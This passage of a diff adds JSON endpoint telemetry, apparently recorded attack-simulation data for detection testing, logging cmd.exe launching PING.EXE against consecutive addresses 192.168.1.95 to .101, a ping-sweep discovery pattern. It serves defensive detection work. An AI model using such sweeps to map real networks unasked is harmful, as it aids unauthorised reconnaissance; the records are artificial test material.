"C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572441990000, + "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.95", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + 
"event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2204, + 
"process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572442140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "event_type": "process", + "pid": 2204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572446990000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-0010FD745201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.96", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4776, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": 
"KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4776, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572447140000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "event_type": "process", + "pid": 4776, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572451840000, + "unique_pid": "{42FC7E13-CB7C-5C05-0000-00108B775201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.97", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4800, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572451990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "event_type": "process", + "pid": 4800, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572456990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010077A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.98", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2992, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572457130000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457140000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572457300000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "event_type": "process", + "pid": 2992, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572461990000, + "unique_pid": "{42FC7E13-CB7D-5C05-0000-0010797C5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.99", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2444, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572462140000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "event_type": "process", + "pid": 2444, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572466830000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-0010D0805201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.100", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572466980000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572471990000, + "unique_pid": "{42FC7E13-CB7E-5C05-0000-001042835201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.101", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572472130000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 
131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + 